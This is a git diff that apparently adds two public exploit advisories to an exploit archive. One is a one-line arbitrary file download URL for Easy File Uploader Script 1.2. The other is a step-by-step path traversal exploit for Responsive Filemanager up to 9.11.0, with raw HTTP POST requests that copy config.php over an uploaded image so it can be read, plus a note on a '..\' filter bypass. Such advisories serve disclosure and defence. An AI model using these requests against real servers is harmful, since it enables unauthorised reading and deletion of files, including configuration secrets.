diff --git a/platforms/php/webapps/41271.txt b/platforms/php/webapps/41271.txt
new file mode 100755
index 000000000..a19555d4f
--- /dev/null
+++ b/platforms/php/webapps/41271.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Easy File Uploader Script v1.2 - Arbitrary File Download
+# Google Dork: N/A
+# Date: 07.02.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Buy: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
+# Demo: http://demos.nelliwinne.net/EasyFileUploader/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/download.php?id=[FILE]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41272.txt b/platforms/php/webapps/41272.txt
new file mode 100755
index 000000000..172dcc370
--- /dev/null
+++ b/platforms/php/webapps/41272.txt
@@ -0,0 +1,77 @@
+[+] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion
+[+] Date: 7 Feb 2017
+[+] Vulnerability and Exploit Author: Wiswat Aswamenakul
+[+] Vendor Homepage: http://www.responsivefilemanager.com/
+[+] Affected version: only tested on 9.11.0 and 9.7.3 (other versions might be affected)
+[+] Tested on: Ubuntu 14.04, PHP 5.5.9
+[+] Category: webapps
+
+[+] Description
+Responsive filemanger is a PHP based file manager that make use of AJAX
+technology. It has various useful features. One of them is copy/cut and
+paste files. However, the copy/cut feature does not santize file name
+that will be copied/cut. Therefore, it is possible for attackers to
+copied/cut any files including PHP files and paste them to overwrite
+existing image files. Then, the attackers could download the overwritten
+image files to read the content of the copied/cut files. Moreover, for
+the cut feature, it can cause the original files to be deleted as well.
+
+[+] Exploit
+1. Upload a normal image file (jpg, png, gif) to a server
+2. Right click at any files, select copy and capture the request with Burp Suite (or any local proxy)
+3. Change parameter "path" to any file name that we would like to download, for example, path=../filemanager/config/config.php
+
+###
+POST /fm/filemanager/ajax_calls.php?action=copy_cut HTTP/1.1
+Host: 192.168.1.128
+Content-Length: 53
+Accept: */*
+Origin: http://192.168.1.128
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/55.0.2883.87 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Referer:
+http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en_EN&popup=0&crossdomain=0&field_id=&relative_url=0&akey=key&fldr=%2F&5869110e2a073
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: last_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
+Connection: close
+
+path=../filemanager/config/config.php&sub_action=copy
+###
+
+4. Go to any sub directory, right click at any files, intercept the request with burp, select "Paste to this directory"
+5. Change parameter "path" to the image file uploaded in step 1, for example, path=subdir/size.png
+
+###
+POST /fm/filemanager/execute.php?action=paste_clipboard HTTP/1.1
+Host: 192.168.1.128
+Content-Length: 20
+Accept: */*
+Origin: http://192.168.1.128
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/55.0.2883.87 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Referer:
+http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en_EN&popup=0&crossdomain=0&field_id=&relative_url=0&akey=key&fldr=subdir%2F&5869110f9a268
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: last_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
+Connection: close
+
+path=subdir/size.png
+###
+
+6. Download the image file uploaded in step 1, it will contain content of the file specified in step 3
+
+[+] Note (about another issue I found)
+During this report, I found another separated issue with the attack filtering that only check for "../" but not "..\" which can be used to bypass all filters if the application runs on Windows server and reported the issue to the owner as well. However, I found out that this issue was found by a guy from hacktizen and detailed in following blog post
+http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
+So, the credit goes for the guy who firstly reported. Perhaps, the guy from hackitizen did not contact the owner of responsive filemanger or there are any problems with communication. Therefore, the issue remains unresolved.
+
+[+] Timeline
+- 02/01/2017: Contact Owner
+- 05/02/2017: Patched version is available
+- 07/02/2017: Public Advisory
\ No newline at end of file